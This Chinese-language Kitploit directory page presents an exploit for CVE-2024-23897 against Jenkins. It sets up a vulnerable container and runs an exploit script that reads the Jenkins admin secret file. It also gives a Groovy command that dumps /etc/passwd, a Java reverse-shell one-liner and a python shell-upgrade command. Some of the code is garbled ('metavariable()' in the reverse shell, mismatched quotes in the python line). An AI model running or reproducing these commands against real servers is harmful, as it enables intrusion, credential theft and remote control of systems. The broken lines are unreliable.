Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Exploit-CVE-2024-23897 | Kitploit
工具/GitHubGitHub/aadi0258/exploit-cve-2024-23897
漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试远程访问工具
GitHubaadi0258/exploit-cve-2024-23897

Exploit-CVE-2024-23897

查看仓库
9个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Exploit-CVE-2024-23897

运行容器

docker run -p 8080:8080 --name vulnerable-jenkins -d jenkins/jenkins:2.441-jdk17

检查日志

docker logs <machine_name>

获取 docker 机器的 IP:

docker inspect vulnerable-jenkins | grep IPAddress

利用代码:

python3 exploit.py --target http://127.0.0.1:8080 --file /var/jenkins_home/secrets/initialAdminPassword --request-timeout 30

Groovy 脚本:

println "cat /etc/passwd".execute().text

RCE

String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(metavariable()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

设置环境变量

export TERM=xterm

获取交互式 Shell

python -c 'import pty'; pty.spawn("/bin/bash")'

下载工具